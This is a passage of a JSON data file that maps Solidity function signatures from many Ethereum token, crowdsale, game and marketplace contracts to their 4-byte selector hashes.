"getUsernameByAddress(address,address)": "0x16fa2f7f", "removeUsername()": "0xb96144fd", "putUsername(string)": "0x56e7bcd1", "UltiCoinICO()": "0x421b2395", "PAST()": "0xbc17a0b4", "Showercoin()": "0x0bc2a3b7", "JMJToken()": "0x3ca65e77", "pause(uint256)": "0x136439dd", "geProposalCount()": "0xef82c8a8", "plutochain()": "0xa968309d", "ratio(uint256)": "0x008df454", "createChild(uint256,address)": "0x81b736e9", "SingularityTest15()": "0x865b0d30", "PaceCoin()": "0xf56d7abe", "UHUGIN()": "0x29a67202", "_checkOpenings()": "0x48bb4347", "_allocateTokens()": "0x27e0feaf", "SingularityTest19()": "0x9384f31e", "LjwToken5(address,address)": "0x9e098d9f", "AppleproToken()": "0xe42a9156", "burn(address,uint256,bytes,bytes)": "0x190a6aa9", "ReferenceToken(string,string,uint256)": "0xe486387a", "transfer(address,uint8)": "0x20e6e921", "STRAToken()": "0x3d3b1fdf", "Verto()": "0x13c68344", "getPlayerCoin(address,address,uint256)": "0x93b69f86", "Voterplayer()": "0xc1440167", "getaddresstotal(uint256)": "0x15b03fde", "_getEarnings(address,address,uint256,uint256,uint256)": "0x1377ae65", "_removeClearingPriceValidator(address)": "0x2d75c39a", "renounceClearingPriceValidator()": "0x4ddc36df", "addClearingPriceValidator(address)": "0x513fdce9", "isClearingPriceValidator(address)": "0xe796570b", "MYEXCTOKEN()": "0xc4043465", "getFunStr()": "0xebb332be", "setFunStr(string)": "0x4216503c", "setContractAddr(address)": "0x286d2e3a", "ALH()": "0xd341281a", "WhyWhyToken(address)": "0xae1d12a6", "NEST()": "0x50180944", "register(address,string,string,string)": "0x063d93d8", "makeInitAccount()": "0xebafefb1", "pushAddr(address)": "0x030326ad", "MINDBODYToken()": "0xa04fce5b", "buy(bool)": "0xc9e25251", "_transferHolder(address,bool,uint256)": "0x84fb427c", "setLegalFileLink(string)": "0x968bb12c", "setAssetFileLink(string)": "0xda9f40b8", "setassetPrice(uint256)": "0x0df8e481", "initAssetFile(string,string,string,string,string,string)": "0x1f7ccc09", "receiveApproval(address,bytes)": "0x80615ffa", "avatar(address,address,uint256,uint256,bytes)": "0xc8a808d6", "wallet(bytes)": "0xc5bf2249", "AsX()": "0x3560f05e", "QuizwinToken()": "0xf81dc03f", "payToGorgona()": "0x6428366a", "Delinetod()": "0x9e03c589", "changeAmisWallet(address)": "0x24724b5b", "releaseAmisToken()": "0x6c189c46", "calculateObtainedAMIS(uint256)": "0xf0f5af8b", "Film()": "0x113a8ed5", "getOrgCertificatesCount(address)": "0xd0f817db", "getOrgClaimsCount(address)": "0xbb52ca2c", "getOrganisationCount()": "0xb082b9c7", "getOrganisationByAddress(address)": "0x68be7887", "getClaimById(string)": "0x4b6c144a", "getCertificateById(string)": "0x45e373ed", "endorseClaim(string,string,string,address,address,string)": "0xbbcd0f02", "issueCertificate(string,string,string,address,address,string)": "0xac47981c", "addOrganisation(address,string,string,string)": "0x7f3436ef", "isOrganisationExits(address)": "0x3ee8747a", "core(uint256,address)": "0x1b64b172", "sign(string,uint256,uint256)": "0x153b31fd", "unconfirm(uint256)": "0xec132ce3", "corePay(uint256,uint256,uint256,string,uint256)": "0xa94ab274", "makeTrade(address,address,uint256,string)": "0x741677a5", "setGovernor(uint8,address)": "0xf1d35260", "payOutGovernors()": "0xa7e350f7", "XCONToken()": "0x45e231a6", "HopiumCoin()": "0xc865c29b", "THToken()": "0x5553dc1e", "___Kill()": "0x682b6706", "___test()": "0x94cc0898", "___AllBalance()": "0xfc0e4262", "BytesToAddress(bytes)": "0xec443813", "Minus(uint256,uint256)": "0x752bece8", "NLog(uint256)": "0x655330f4", "UserDestroy(address,address)": "0x0caa5d91", "CheckTimeout()": "0xac475e5c", "Triangle(uint256)": "0x64ddedc6", "Rectangle(address,address)": "0x16e8f2c4", "CbxeToken()": "0x971a9a29", "BRCToken()": "0xa860bfa2", "addExceptions(address[])": "0xcd327398", "unlocktoken(address,address,address)": "0xcefd2239", "AltTokenDistribution(address)": "0x7388fb2b", "RTeamCoin()": "0x69cb418a", "StyToken(address,address)": "0xccdd49f2", "cancel(address,address,address,uint256,uint256,uint256,uint8,bytes32,bytes32)": "0x432607fc", "claimByTeam()": "0x99ccbec6", "trade(address[5],uint256[11],uint8[3],bytes32[6])": "0x3f392b42", "getMiningRate(address)": "0xa85d3179", "updateCancels(address,uint256)": "0xbce4d041", "withdraw(address,uint256,uint256,address,uint8,bytes32,bytes32)": "0xd5ca35bc", "setMiningRate(address,uint256)": "0x058fe7d9", "setBEY(address)": "0x7039dcdc", "BitEyeExchange(address)": "0x0d5d6f7a", "setCardUpgradeLevels(uint256,uint256,uint256)": "0x0f3cb8bc", "transferAbnormalERC20Tokens(address,address,uint256)": "0x97cbdfc9", "Superpack()": "0x636c6524", "unlock(address,address)": "0xe674a0bd", "lock(address,address)": "0x17ffe171", "ANV()": "0xe0728801", "GOToken()": "0x7e5b1cdd", "nDEX(address,address,address,address,uint256,uint256,uint256)": "0x3084e3ac", "getTokenSaleTime()": "0x1d849220", "getTier(uint256)": "0x4f062c5a", "sendPrivateSaleTokens(address,uint256)": "0x5eb62d75", "setWhitelistAddress(address)": "0xa224c745", "changeReserveWallet(address)": "0x05e7781e", "changeTrusteeOwner()": "0x75a53a8f", "changeTokenController()": "0x211a1ba8", "totalPublicSaleWei()": "0x7f0d35e2", "startPublicSale(uint256,uint256)": "0x3a12e933", "addGrant(address,uint256,bool)": "0xa53f0e14", "setCapForParticipants(address[],uint256[])": "0xcf7e06cb", "initTiers(uint256[],uint256[])": "0x7f89ce48", "grant(address,uint256,uint256,uint256,uint256,uint256,uint256,uint256,bool)": "0x68ce77d0", "VestingTrustee(address)": "0x4d82f25c", "presaleRate()": "0x42f39381", "totalCap()": "0x16450092", "capRemaining()": "0xf47279d2", "Presale(uint256,uint256,uint256,uint256)": "0x11ae40b2", "LLV_v31_4()": "0xebe1df4f", "terminateTokenSale()": "0xd313f235", "terminateSale()": "0x80787f2c", "isSaleLive()": "0xf71143ca", "uintToBytesForAddress(uint256)": "0x79687166", "popFirstFromArray(address[])": "0x111da3a7", "getKing()": "0x7920d804", "mintForwarder(uint256,bytes32,address[],int256)": "0x63c06fe9", "epochCount()": "0x829965cc", "TRUST()": "0x1de012cd", "COINBIG()": "0x6625123b", "getKeys(uint256)": "0x8d357fa3", "registerName(string,address,bool)": "0xafc0bf27", "getCustomerBalance(address)": "0xbaac274d", "deactivated()": "0x556ed30e", "BioCoin()": "0xb94512c7", "EEB(uint256,string,uint8,string)": "0xc3cfe00f", "Itube()": "0x9f65f242", "KappyKoin()": "0xdd5c2678", "batchRegularTransfers(bytes32[],bytes32[])": "0xf02fc78f", "TokenBEN(uint256,string,uint8,string)": "0x8c71eaf1", "TIDAChain()": "0x0af8bd95", "Guess(string)": "0xa1022294", "POWEROFTHREE()": "0x4cf178c6", "IBG(string,string,uint8,uint256)": "0xb16d0e38", "addInsuranceProduct(uint256,string)": "0x71c157d1", "OPAY()": "0x143c7a3f", "addTotalSupplyAmount(uint256)": "0xa69177b1", "EasyPocketCoin(uint256,string,uint8,string)": "0x44e20fd2", "sell(bytes32,uint256)": "0xb592de3a", "buyOffer(uint256,uint256,address,bytes32)": "0x53bb2eb6", "getOffer(bytes32)": "0xd597b8c8", "sellOffer(uint256,uint256,address,bytes32)": "0xe5ba0b8a", "getOwnedAndTotalTokens(bytes32,address)": "0x084b8246", "placeBet(bytes32,address)": "0x83be9d54", "changeOwnerOfMonethaUsersClaimStorage(address)": "0x70269774", "SDD_Erc223Token()": "0x6ee84bb7", "fondPlatform()": "0xefed7b0a", "getIGOAccoountByAddr(address)": "0x42946d88", "getBalanceByAccount(string)": "0xb81ff45b", "getCanSellBalance()": "0x667815a2", "TokenTycoonIGO()": "0xa311d970", "GaonToken()": "0x592af188", "WNTOToken()": "0x5c97f464", "refreshInvestor(address,address,uint256)": "0xe7aef169", "distributeCallback(uint256,address[])": "0xfb282a17", "purchaseCallbackOnAcceptAndDistribute(uint256,address[],uint256[])": "0xa9171d56", "getOwed(address)": "0x70c0b647", "getMinBid(uint256)": "0x7f21d498", "openAuction(uint256)": "0x1edc8f91", "createAuction(address,uint16,uint16,uint256,uint64,uint16,uint16,uint64,uint256)": "0xa944f15b", "FirexToken()": "0xe9519a6b", "luke(uint256,string,string)": "0xe371cdd4", "setTransferEnablingDate(uint256)": "0x728f31e7", "SVIP()": "0x99600baa", "AutoChainTokenCandy()": "0x6ec386d3", "proxy(address)": "0x06713c3e", "LTRToken()": "0xa1ca8f8d", "Alaves()": "0x7bc25da8", "isIcoInProgress()": "0x57cdd078", "adminAddICO(uint256,uint256,uint256,uint256,uint256,uint256[],uint256[],bool)": "0xd25f08b1", "adminUpdateWhiteList(address,address,bool)": "0xbd2b6444", "artTokenoken()": "0x6a3845fe", "register(string,string,string)": "0x4cd08d03", "crowdClosed()": "0x1d68b449", "setIEIAddress(address)": "0x1ecdfd2f", "removeWhitelistedAddress(address,address)": "0x2eb37466", "addWhitelistedAddress(address,address)": "0xb08cfb84", "safeWithdrawal4(address)": "0xb89bf71d", "setDefaultMint(uint256)": "0x0ef524ff", "newUser(address)": "0x0cb5f653", "setMasterNode(address)": "0xdfe3e746", "masterNodable()": "0x1a2d3be8", "jugar()": "0xbca65475", "entrarAJuego(uint256)": "0x18c20f44", "crearJuegosPublico()": "0xece9aed4", "crearJuegos()": "0x63a2de29", "gatito()": "0x1e4c6e7e", "COOLBTCEXCHANGE()": "0x7b599b5b", "timelock(address,uint256,uint256,uint256,bool)": "0xd101d3b2", "updateAppInstance()": "0x3e7f54a9", "updateAppExec(address)": "0x7185393c", "addToBlacklist(address[])": "0x935eb35f", "SetStepFunctionWrapper(address,address)": "0xd05407d4", "OfferToken(uint256,string,string)": "0xf18ecf80", "AlpineMegalith(uint256,string,uint8,string)": "0x24285ade", "paleyer2show(uint8,uint8,uint8,uint8,uint8)": "0x9caf9695", "paleyer1show(uint8,uint8,uint8,uint8,uint8)": "0xfb176b69", "playe2Bid()": "0xfe2e306b", "playe1Bid()": "0x7e93810b", "getPartner()": "0x6abb4a50", "joinCreateGame()": "0x524e1149", "romper()": "0x65c2d3a0", "depositar()": "0x3d922f90", "borrar()": "0x2b59d1fc", "crear(uint256)": "0x8cee8778", "storePortfolio(uint256,uint256[],uint256[],uint256[])": "0x4485d32c", "storeCryptoNames(string)": "0x5c6cad31", "updateTotalSupply()": "0xd0dc5c65", "changeDividendWallet(address)": "0x5928c7db", "_joinGame(address,uint256)": "0x10445a16", "_share(uint256)": "0x46570653", "getExtender()": "0x1a81e7b4", "transferExtender(uint256)": "0x88c91fb1", "joinGame(address,uint256,address)": "0x83e2a0c4", "_setUserInfo(address,uint64,uint256,address)": "0xeb142e36", "extendCost(uint256)": "0xe133ad53", "getExtendAddr(address)": "0xf9f2ecb6", "pwr(uint64,uint64)": "0xd7b11125", "sq(uint64)": "0x14219ff9", "qwercoin()": "0xac6da90d", "Mido()": "0xb74bee6a", "computeFeeRate(address)": "0x873ab2ce", "burnCarbonDollar(address,uint256)": "0xba6f4ab0", "convertCarbonDollar(address,uint256)": "0x0d4b8208", "unlistToken(address)": "0xabcb9934", "_mintCUSD(address,uint256)": "0x1825d0e8", "setCUSDAddress(address)": "0xa00d7740", "convertWT(uint256)": "0x3c584d86", "mintCUSD(address,uint256)": "0x91dc1b1d", "_increaseApproval(address,uint256,address)": "0x2fa07bfc", "_decreaseApproval(address,uint256,address)": "0xb13b6a2a", "blacklisted()": "0x5bae9ce9", "approveBlacklistedAddressSpender(address)": "0x662f94c0", "destroyBlacklistedTokens(address,uint256)": "0xc534ba4b", "poicoin()": "0x37dd5dd6", "nextSaleStage()": "0xc6028cf3", "publicSaleCapReached()": "0x08a1360a", "Purchase(address)": "0x233e0877", "_updateLandData(uint256,uint256,string)": "0x501c5205", "updateManyLandData(uint256,uint256[],string)": "0x426a0af3", "updateLandData(uint256,uint256,string)": "0x28b34ef6", "_supportsInterface(bytes4)": "0x15c8276d", "PUBG()": "0x45115a17", "isBonusPayable(address,string,uint256,uint256,uint256,uint256)": "0x8397f3bc", "addWalletEmail(address,string)": "0x53b90b5b", "addPaymentDetail(address,bytes32,uint256)": "0x1968c160", "getNumberWallets()": "0x553b74aa", "getWalletBonuses(address)": "0xf6623552", "addWalletBonus(address,string)": "0xf0534e0a", "addBonus(string,uint256,uint256,uint256,uint256,string,uint256,string,uint256)": "0xa4368de7", "getBonusNames()": "0x2e0e5ce8", "getWallets()": "0xdb7a4605", "addK(uint256)": "0x729f2439", "HSDJCoin()": "0x35b4a93e", "releaseUrl(uint8)": "0x91fdbb55", "releaseChecksum(uint8)": "0x848a2130", "latestReleaseUrl()": "0x611408ff", "latestReleaseChecksum()": "0xbf8bf85e", "addRelease(bytes32,string)": "0x8b409cec", "distributePeerTokens()": "0x2b625874", "distributeWalletTokens()": "0x7bf5b5d6", "thisVoterExists()": "0x79a3510d", "saasPayment(address,uint256)": "0x8cb240b0", "saasPayUser()": "0x1a592bc1", "canAddNewClient(address)": "0x55e38f9b", "getUserTokensCount(address)": "0xa553e1da", "payUserOutgoingTransactionCommission()": "0x8515e413", "Emoji()": "0x1873355e", "MonsterBitToken()": "0xdad98b52", "removeIcoContract()": "0x28159ef6", "issueToken()": "0xa1ee8c78", "checkPermissions(address)": "0x22da10b0", "preSale(address,address,uint256)": "0x728de91c", "TripsCoin()": "0x86312b1b", "balanceOfa(address)": "0x56e567e5", "getEth(uint256)": "0x8e3073a6", "selfdestructs()": "0x4ed0efd1", "setPrices(uint256)": "0xa3201daa", "EncryptedToken()": "0x99a8f2fe", "BlackSnailE()": "0x4ffb32d3", "sendFund()": "0xdd0cf15d", "getWalletOut()": "0x45d58a4e", "RYXEX(address,address,address,uint256,uint256,uint256)": "0x5666da53", "CCH_EDIT_3()": "0xa1696076", "Puttu()": "0x0dc6c392", "Statustelega(address)": "0xc6d784cc", "StatusCow(address,uint256)": "0xdbf79dcd", "CountCow(address)": "0x5c7713d4", "TelegaOut(address)": "0xc51ce17b", "SendOwner()": "0xc34c27ad", "TelegaSend(address)": "0x31f2d72d", "DeadCow(address,uint256)": "0x38a8a0ca", "TransferCow(address,uint256)": "0x7de2e95c", "saleMilk()": "0xdbd7fd13", "MilkCow(address)": "0xa1405522", "payCow()": "0x59112e79", "ownerOnly()": "0x896f40dd", "setDecimals(uint8)": "0x7a1395aa", "setReserve(uint256)": "0x4256dbe3", "countUsers()": "0xf8fb1d0f", "getUser(address,address)": "0x90bde517", "setUser(address,address,string,uint256)": "0xfc58fc49", "AdsVenture()": "0x74bd6261", "withdrawERC20s(address,uint256)": "0x40698729", "setDAIRate(uint256,uint256)": "0x2f5e8d29", "setETHRate(uint256,uint256)": "0xcbfebb34", "calculateAmountForDAI(uint256)": "0xdc01bd0c", "calculateAmountForETH(uint256)": "0xf1daa5ba", "tradeDAI(uint256,uint256)": "0x22c69b15", "tradeETH(uint256)": "0x96a70169", "Exchange(address,address,address,uint256,uint256,uint256,uint256)": "0x9eb0ad03", "isPresale()": "0x95364a84", "triggerAutorelease()": "0x7d6ad4cd", "delayAutorelease()": "0x127b0901", "logWorkerStatement(string)": "0xf3c74496", "logPayerStatement(string)": "0x7345da39", "BurnablePayment(bool,address,uint256,uint256,string,string)": "0x83b49485", "getBPCount()": "0xfeb5d106", "newBP(bool,address,uint256,uint256,string,string)": "0x64acef7d", "NationalCoin()": "0x24fd2be1", "BeeGims()": "0xa4f6d5ce", "AkilosToken()": "0xa31caec8", "adjustMinter(address,bool,int256)": "0x30e08a6e", "Mintable()": "0x6afbd04f", "getLLV_edit_34()": "0x688d54b7", "setLLV_edit_34(string)": "0xf3d6cb29", "getLLV_edit_33()": "0xfe435f6b", "setLLV_edit_33(string)": "0x62eb5789", "getLLV_edit_32()": "0xf505a299", "setLLV_edit_32(string)": "0x547c4137", "getLLV_edit_31()": "0x4c2ff0ae", "setLLV_edit_31(string)": "0x702a5f4f", "getLLV_edit_30()": "0xef35cdbb", "setLLV_edit_30(string)": "0x72b30d39", "getLLV_edit_29()": "0xb595357b", "setLLV_edit_29(string)": "0xeec3e2e8", "getLLV_edit_28()": "0x21015328", "setLLV_edit_28(string)": "0xc5809312", "getLLV_edit_27()": "0x621fb946", "setLLV_edit_27(string)": "0x0d7b4ac4", "getLLV_edit_26()": "0x44aa768f", "setLLV_edit_26(string)": "0x60cfc624", "getLLV_edit_25()": "0x43596b8b", "setLLV_edit_25(string)": "0x28242dd4", "getLLV_edit_24()": "0xe83d589b", "setLLV_edit_24(string)": "0x01b54744", "getLLV_edit_23()": "0x23dd03c3", "setLLV_edit_23(string)": "0xc7cd31d5", "getLLV_edit_22()": "0x5b7c38ad", "setLLV_edit_22(string)": "0x850e2bc4", "getLLV_edit_21()": "0x3106aa80", "setLLV_edit_21(string)": "0xf10fae62", "getLLV_edit_20()": "0xae2da5c5", "setLLV_edit_20(string)": "0xb6506f25", "getLLV_edit_19()": "0xb4542a70", "setLLV_edit_19(string)": "0x8f58190e", "getLLV_edit_18()": "0x0ed659b4", "setLLV_edit_18(string)": "0xeb800846", "getLLV_edit_17()": "0x62697f69", "setLLV_edit_17(string)": "0x961a9218", "getLLV_edit_16()": "0x4c0bd3ef", "setLLV_edit_16(string)": "0xbe4d06cc", "getLLV_edit_15()": "0x6014e37c", "setLLV_edit_15(string)": "0xde901104", "getLLV_edit_14()": "0xd094dd21", "setLLV_edit_14(string)": "0xc40b716c", "getLLV_edit_13()": "0xf37ff01b", "buy(bytes,int256)": "0x145e1944", "getPrice(bytes,int256)": "0xf9297a40", "add(bytes,int256,uint256)": "0xbdd2ae24", "News()": "0x9c84d1f7", "setAdminsContract(address)": "0x08a6fb88", "TorontoRules(address,address[])": "0xac3dc451", "test(uint32[26],uint32[4])": "0x4b8e38db", "expand(uint32[4],uint32[26])": "0xed25e6c2", "decrypt(uint32[26],uint32[4])": "0xa8e553f5", "encrypt(uint32[26],uint32[4])": "0x53127b88", "rotate_right(uint32,uint32)": "0x66ac777e", "rotate_left(uint32,uint32)": "0x434d16f5", "shift_right(uint32,uint32)": "0xd924c660", "shift_left(uint32,uint32)": "0x625126ed", "byte32ToString(bytes1[32])": "0x5a129e97", "byte64ToString(bytes1[64])": "0x045ccf7b", "adminDeleteRegistry()": "0x3af41dc2", "adminRetrieveDonations()": "0x345e3416", "adminSetAccountAdministrator(address)": "0x49f0c90d", "adminSetRegistrationDisabled(bool)": "0x9b6d86d6", "adminUnregister(string)": "0x0cc04b55", "getAddressOfId(uint256)": "0xec43eeb6", "getNameOfAddress(address)": "0xb2dad25d", "getAddressOfName(string)": "0x38ec6ba8", "getNumberOfAccounts()": "0x309e36ef", "register(string,address)": "0x1e59c529", "TweetRegistry()": "0xc9fbe626", "getEmployerInvoicesByStatus(address,address,uint8)": "0x846b23d4", "getFreelancerInvoicesByStatus(address,address,uint8)": "0xe9013cf7", "getEmployerContractsByStatus(address,address,uint256[],uint256[])": "0x2f72ffaf", "getFreelancerContractsByStatus(address,address,uint256[],uint256[])": "0xeea17587", "userContractsPred(address,uint256[],uint256[],uint256)": "0xc00710fa", "searchFreelancers(address,uint256,uint256[],uint256[],uint8,uint256,uint256[],uint256[],uint256[],uint256)": "0x0f52fb0a", "isFreelancerAvailable(address,address)": "0x13413858", "hasJobRecommendations(address,address,uint256)": "0xa36badd7", "hasLanguage(address,address,uint256)": "0x4aac390a", "hasHourlyRateWithinRange(address,address,uint256[],uint256[])": "0x9a48007d", "getFreelancerHourlyRateCurrency(address,address)": "0xb4be6190", "getFreelancerHourlyRate(address,address)": "0x97d8a7e9", "hasFreelancerMinRatingsCount(address,address,uint256)": "0xa1616c92", "hasMinRating(address,address,uint8)": "0x950da0e6", "isFromState(address,address,uint256)": "0x3dd86478", "isFromCountry(address,address,uint256)": "0x658389cb", "addToEmployerTotalPaid(address,address,uint256)": "0x1b3878f5", "addToFreelancerTotalEarned(address,address,uint256)": "0x00397647", "getEmployerAvgRating(address,address)": "0x7f1a2a73", "addToEmployerAvgRating(address,address,uint8)": "0x50ddd6f7", "getFreelancerAvgRating(address,address)": "0x88bc65e3", "addToFreelancerAvgRating(address,address,uint8)": "0xc9c798b3", "addToAvgRating(address,address,string,string,uint8)": "0x38b7a530", "userSponsorshipsPred(address,uint256[],uint256)": "0x9d3d1d82", "getSponsorships(address,address,bool)": "0xd84fdbed", "getSponsorships(address,address)": "0x8f512c47", "subTotalSponsored(address,address,uint256)": "0x7cee8e70", "addTotalSponsored(address,address,uint256)": "0x4586a517", "addSponsorship(address,address,uint256)": "0x2b5184a6", "subEmployerTotalInvoiced(address,address,uint256)": "0xffc92376", "addEmployerTotalInvoiced(address,address,uint256)": "0x6977d9de", "subFreelancerTotalInvoiced(address,address,uint256)": "0x80200e12", "addFreelancerTotalInvoiced(address,address,uint256)": "0x93325812", "getEmployerContracts(address,address)": "0x1e909841", "addEmployerContract(address,address,uint256)": "0xa5e108af", "getFreelancerContracts(address,address)": "0xcb91aec7", "addFreelancerContract(address,address,uint256)": "0x511aae8b", "getFreelancerContractsCount(address,address)": "0x343ab68b", "getEmployerJobs(address,address)": "0x93f43863", "addEmployerJob(address,address,uint256)": "0x8848fb0d", "setUserLanguages(address,address,uint256[])": "0x10bc044f", "hasStatus(address,address,uint8)": "0x8a8ede8a", "isActiveFreelancer(address,address)": "0x3818657b", "isActiveEmployer(address,address)": "0x41aed7cb", "addSentMessage(address,address,uint256)": "0x1b3821e8", "addReceivedMessage(address,address,uint256)": "0x10fab6c7", "setUserNotifications(address,address,bool[],bool,uint8[],uint8)": "0xad003aeb", "getFreelancerCategories(address,address)": "0x1e7ea8d5", "setFreelancerCategories(address,address,uint256[])": "0x69c261ed", "getFreelancerSkills(address,address)": "0xd8db583f", "setFreelancerSkills(address,address,uint256[])": "0x3c17622a", "setEmployer(address,address,string)": "0xab0e6765", "setFreelancer(address,address,bool,string,uint256,uint8,uint256[],uint256[],string)": "0xf6d2ff9d", "setUser(address,address,string,string,bytes32,uint256,uint256,uint256[],string,string)": "0x66d2da12", "getAllUsers(address)": "0x14b419c9", "userExists(address,address)": "0x3505e844", "getUserCount(address)": "0x03e8837c", "MinimumViableToken(uint256)": "0x50133d50", "testGetAllLawyers()": "0x33b56638", "testGetLawyerAtIndex()": "0x33722c47", "testGetLawyerCount()": "0x0ca72e82", "testUpdateCase()": "0xff3fb765", "testDeleteLawyer()": "0x1a48fb3a", "testIsLawyer()": "0x0f832bc6", "testInsertLawyer()": "0xa4ed22b6", "update(uint256,bytes32)": "0xd3b7576c", "Testimony()": "0xd899d312", "addMilestone(uint256,uint256,uint256)": "0xd279830c", "isGoalReached()": "0xd3eb6f61", "EtherFundMeIssueTokensCrowdfunding(string,string,string,uint256,uint256,uint256,address,address,string,string,uint256,uint256,uint256,uint256)": "0xdc585713", "checkSender()": "0x47fb0bed", "MultiSigRules(address[])": "0x5ba3e63e", "acceptExternalTransfer(string,uint256,string,uint256)": "0x463d3cda", "giftPool()": "0x84be59d1", "nullBonusMessage()": "0x49ee39ba", "contribution()": "0x50520b1f", "SALE_PERCENTAGE()": "0xc84b470f", "TOKENS_DISTRIBUTED()": "0xa1013abb", "PoolAdvisors()": "0x43c8124d", "QUOTE()": "0x9c579839", "tgrSettingsBlocksPerStage()": "0x25db6699", "foundationTokenSupply()": "0xfb70f765", "gatewayOpened()": "0x1636ed74", "BONUS()": "0x4b8624c4", "unmintedGBT()": "0xe267761f", "initialTokenBalance()": "0xdccb37f1", "ROLE_VENDOR()": "0x0fde0f8e", "end_()": "0x052ca699", "totalEthInWeiForSecondIco()": "0x7e482379", "setToNotForking()": "0x331e6b78", "endSecondWeek()": "0xd10865a7", "voteRelease()": "0x5ef3f3d1", "prepareDividends()": "0x8e50a65d", "icoStartTimestampStage()": "0xdee1cfd8", "payoffAmount()": "0xbe1abba5", "dateManager()": "0x8f842851", "adPriceDay()": "0x06c1b0ba", "Fin()": "0xae8e3b70", "ProcessTxFee()": "0x80b38c2d", "thirdRoundTime()": "0xc4735121", "isStopPlay()": "0xcaf05ce3", "MAX_ALLOWED_BOUNTY()": "0x51c13af3", "betConditions()": "0x3912253e", "narcoCore()": "0x019f5c5b", "PAYOUT_DELAY_INTERVAL()": "0xcc5b13a0", "queueMode()": "0xa2b7e23d", "numOfTimesSteal()": "0x51ab720d", "migrateStateFromHost()": "0x9abb08ed", "meltingContract()": "0xf7ddfb4b", "logicContractAddress()": "0xbccda810", "close_bank()": "0x22e62038", "shiftSalePurchase()": "0xc004a877", "bountyRewardPercent()": "0x669f6d80", "tokenTransferDelegate()": "0xafb97c20", "totalWeiRaisedDuringICO4()": "0xc18e8903", "currentDevFees()": "0xe4b541f3", "withdrawServiceFee()": "0x849bb2db", "ETH_TLD_LABEL()": "0x9b227a97", "stopPreIcoMint()": "0x23ef2e4f", "TermsOfUse()": "0xd2c731d9", "tickets10price()": "0x895bf2e1", "startTimeOfSaleLot4()": "0xdd34dab8", "foundationTokensAllocated()": "0xd7b1b9c4", "icoPrice_()": "0xba773a70", "preITO()": "0x9f2bc32b", "gotoNextState()": "0x49c1ad0f", "COIN_SUPPLY_ICO_PHASE_1()": "0x234e0056", "ethPriceInUSD()": "0x891a8b85", "withdrawal_gas()": "0x5ec93cb2", "institutionAllocation()": "0xdf09921f", "TOTAL_COMMUNITY_ALLOCATION()": "0x68acb7b7", "sudoEnabled()": "0x388911dc", "stageThreeStart()": "0x4187a193", "allocationsLength()": "0xfdeb49b0", "mtEndTime()": "0xe9377aca", "rebatePeriod_()": "0x9d1a9ff9", "m_sharedDividendBalance()": "0xef1bfef9", "LOCK_SLOTS()": "0x2c2622db", "buyBackPriceWei()": "0x33fd9397", "lastTier()": "0x7159db81", "prestige()": "0x9c7081df", "BTC_SUISSE_TIER_2()": "0xb3dd23e8", "lastCallstopPreICO()": "0xfa41fd32", "overdraftTotal()": "0xc14e61ba", "Start1()": "0xa5613724", "TOKEN_REFERRAL()": "0x72f4f5f9", "lastRoundLengthUpdateRound()": "0x0fe1dfa8", "squirrelReq()": "0xeb11dd7b", "gift()": "0x24b04905", "lock_by_manager()": "0x92509c16", "management()": "0x88a8d602", "noStoreIsActive()": "0xed4e65fb", "withdrawTheUnsoldTokens()": "0x7d2d92ac", "gasAmt()": "0x075acda7", "getReceiversCount()": "0xa72a05f7", "howManyEthersToKillContract()": "0x32e07a20", "STARTING_VINES()": "0xf6b9fd79", "tokenPriceUSDWEI()": "0x1ebe8105", "CENTS()": "0xf5582870", "FAPFundDeposit2()": "0x2378fe2d", "timeSlicesCount()": "0x756abb98", "TOKEN_CENTS()": "0x514ec8ae", "LOG2_E()": "0x24902e24", "reclaimEtherDeadline()": "0x9eec22e7", "teamAndFoundersWallet()": "0x8b8ecffa", "raffle_addr()": "0xf7fce4da", "AUCTION_WHEN_PERCENTAGE_LOGIC_STARTS()": "0xf17f3ca3", "invalidationBounty()": "0x39363923", "birthday()": "0x5f9f4734", "currentLowestCount()": "0x6382789d", "companyPeriodsElapsed()": "0x58491ecb", "reservePricing()": "0x5eaefac1", "startBuyBackTwo()": "0x961e99d9", "setWalletOut1(address)": "0x5e199157", "SocialMediaPay()": "0x3c617685", "LuckCashToken(uint256)": "0xde42dcc9", "addToWhiteList(address,uint256,uint256)": "0x391c44b2", "vestedAmount()": "0x44b1231f", "releasableAmount()": "0x5b940081", "VestingFund(address,uint256,uint256,address)": "0x5c2b18e9", "reportContribution(address,uint256)": "0xab06bea3", "canContributeAmount(address,uint256)": "0xd54ced9c", "transferFromCrowdsaleToUserAdoptionPool()": "0x596aadaf", "createVestFundFor(address,uint256,uint256,uint256)": "0xc3fb5e5f", "mintTokensFor(address,uint256,uint256)": "0xaface2f1", "LuckCashCrowdsale(uint256,uint256,uint256,address,address)": "0xc939625b", "getPoolCapSize(uint256)": "0x9604a24b", "transferRemainingTokensToUserAdoptionPool(uint256)": "0xb78fd7bc", "PoolSegregationCrowdsale(uint256)": "0x2eaa7be9", "setReconciliationDate(uint256)": "0xc8dc7e19", "enterRecoveryMode()": "0xe77aaee2", "MultiSigWallet(address[],uint256,uint256)": "0xda9f6918", "ScudoCash()": "0x9900c978", "RedSoxYankees410()": "0xb056bb81", "reclaimUnwantedGift()": "0xd6875520", "refillGift()": "0x93e432d4", "OnePercentGift()": "0xc26d69e1", "ALTnextCoin()": "0x04089c7d", "FoodSafetyChain()": "0xeed0c172", "buy(uint256,string,address,address,address,address)": "0xdc9564d5", "kill(address,address)": "0x0567e83e", "withdrawBalance(address,address)": "0x15a269f7", "getOrderDetails(uint256,uint256)": "0x2c203edd", "getNumberOfOrders(uint256)": "0x6517ef33", "_verifyOwnershipOfTokens(uint256,address,uint256)": "0xf70d7629", "_transferOrderMoney(uint256,address)": "0xcbc066ab", "fillBuyOrderPartially(uint256,uint256,uint256)": "0xe9198076", "fillBuyOrder(uint256,uint256,uint256)": "0xc7ae3ad5", "fillSellOrderPartially(uint256,uint256,uint256)": "0x181f1965", "fillSellOrder(uint256,uint256,uint256)": "0xb3b5c0ee", "cancelRequest(uint256,uint256)": "0xd586d2e4", "placeBuyRequest(uint256,uint256,uint256)": "0x445d60d3", "placeSellRequest(uint256,uint256,uint256)": "0xfe0ba34e", "MarketBase()": "0x1b3ca096", "_updateTradingVolume(uint256,address,address,uint256)": "0xa6605a77", "releaseNextShares(uint256)": "0xb608c938", "claimShares(uint256,uint256)": "0xc50aea06", "addNewCompany(string,uint256,uint256,uint256,uint256)": "0x4cce4d63", "addPromotionalCompany(string,uint256,uint256,uint256)": "0x2399e1f2", "transferPromotionalShares(uint256,address,uint256)": "0x1567d7a7", "_transfer(uint256,address,address,uint256)": "0x3a60703b", "_computeSalesCut(uint256)": "0x50409041", 